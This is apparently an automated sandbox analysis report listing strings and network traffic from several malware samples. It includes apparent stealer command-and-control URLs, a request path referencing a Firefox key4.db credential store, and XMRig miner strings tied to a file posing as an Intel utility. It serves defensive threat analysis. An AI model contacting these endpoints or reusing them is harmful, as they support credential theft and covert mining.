                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                          Source: 95ae71a780.exe, 0000000C.00000002.2671264301.0000000000423000.00000002.00000001.01000000.0000000A.sdmp, 95ae71a780.exe, 0000000C.00000003.2239333580.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: svchost.exe, 00000029.00000002.2371900204.000000000283C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                          Source: svchost.exe, 00000029.00000002.2371900204.000000000283C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxex
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
                          Source: 9f237e29d5.exe, 0000002F.00000003.2565676452.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/$1
                          Source: 9f237e29d5.exe, 0000002F.00000003.2616619099.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2570423163.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2545285658.000000000132F000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/%
                          Source: 9f237e29d5.exe, 0000002F.00000003.2616619099.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2570423163.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/N
                          Source: 9f237e29d5.exe, 0000002F.00000003.2617545293.0000000001345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
                          Source: 9f237e29d5.exe, 0000002F.00000003.2537049958.0000000003A16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiFj
                          Source: 9f237e29d5.exe, 0000002F.00000003.2513900579.0000000003A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiGw9kB2
                          Source: 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiIO
                          Source: 9f237e29d5.exe, 0000002F.00000003.2466238120.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2617545293.0000000001345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiY
                          Source: 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apier2
                          Source: 9f237e29d5.exe, 0000002F.00000003.2466498392.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apigs
                          Source: 9f237e29d5.exe, 0000002F.00000003.2544502314.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2537049958.0000000003A16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apin
                          Source: 9f237e29d5.exe, 0000002F.00000003.2616619099.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/v
                          Source: 9f237e29d5.exe, 0000002F.00000003.2466238120.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                          Source: 9f237e29d5.exe, 0000002F.00000003.2565676452.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apical
                          Source: 9f237e29d5.exe, 0000002F.00000003.2616200054.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apix/24a4ohrz.default-release/key4.dbPK
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                          Source: d2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/8
                          Source: d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/AE
                          Source: d2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/U
                          Source: d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377056263.000000000134E000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2263716893.0000000003AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                          Source: d2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190430554.000000000136C000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api/
                          Source: d2cb36d600.exe, 0000000B.00000003.2263478988.0000000003AF3000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2263716893.0000000003AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apip
                          Source: d2cb36d600.exe, 0000000B.00000003.2270333586.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270263915.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375485674.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377229160.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355246636.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375415933.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355380887.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/jh
                          Source: d2cb36d600.exe, 0000000B.00000003.2270333586.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270263915.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375485674.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377229160.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355246636.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375415933.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355380887.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/la
                          Source: d2cb36d600.exe, 0000000B.00000003.2270333586.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270263915.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375485674.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377229160.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355246636.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375415933.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355380887.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/ob
                          Source: d2cb36d600.exe, 0000000B.00000003.2190430554.000000000136C000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                          Source: d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/piZ
                          Source: d2cb36d600.exe, 0000000B.00000002.2377190667.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/xe
                          Source: d2cb36d600.exe, 0000000B.00000003.2190380016.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375048066.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376937453.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270396851.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2354295558.0000000001333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                          Source: d2cb36d600.exe, 0000000B.00000003.2375048066.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376937453.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2354295558.0000000001333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/apicrosoft
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                          Source: 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: 9f237e29d5.exe, 0000002F.00000003.2466238120.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: d2cb36d600.exe, 0000000B.00000003.2240497963.0000000003B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                          Source: 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                          Source: 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: d2cb36d600.exe, 0000000B.00000003.2240844210.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49717 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49718 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49725 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49727 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49728 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.8:49737 version: TLS 1.2
                          Source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_88145586-e
                          Source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_b91e6847-8
                          Source: Yara matchFile source: 35.3.80f68847d3.exe.57c0000.7.raw.unpack, type: UNPACKEDPE
